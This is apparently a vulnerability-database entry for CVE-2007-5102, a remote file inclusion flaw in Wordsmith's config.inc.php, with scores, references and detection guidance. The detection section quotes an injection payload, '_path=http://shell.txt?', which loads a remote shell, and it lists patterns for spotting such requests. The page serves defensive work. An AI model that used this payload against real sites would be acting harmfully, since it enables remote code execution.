CVE-2007-5102
published 2007-09-26CVE-2007-5102: PHP remote file inclusion vulnerability in config.inc.php in Wordsmith 1.0 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary…
PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
38.56%
98.4th percentile
PHP remote file inclusion vulnerability in config.inc.php in Wordsmith 1.0 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the _path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wordsmith | wordsmith | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor HTTP requests targeting config.inc.php with a URL-valued '_path' parameter, which is the RFI injection point. ↗
- →The RFI payload appends a '?' after the remote shell URL to nullify any appended local path suffixes (e.g., ?_path=http://shell.txt?). Detect GET requests to config.inc.php where the _path parameter contains 'http://' or 'https://'. ↗
- →Exploitation requires register_globals to be enabled on the target PHP installation. Audit PHP configurations for register_globals=On as a prerequisite indicator. ↗
- ·The vulnerability is only exploitable when PHP's register_globals directive is enabled; installations with register_globals=Off are not affected. ↗
- ·The exploit title references version 1.1b while the NVD entry specifies 1.0 RC1; detections should cover both version strings. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://osvdb.org/37223http://secunia.com/advisories/26924http://www.vupen.com/english/advisories/2007/3251https://exchange.xforce.ibmcloud.com/vulnerabilities/36746https://www.exploit-db.com/exploits/4446http://osvdb.org/37223http://secunia.com/advisories/26924http://www.vupen.com/english/advisories/2007/3251https://exchange.xforce.ibmcloud.com/vulnerabilities/36746https://www.exploit-db.com/exploits/4446
2007-09-26
Published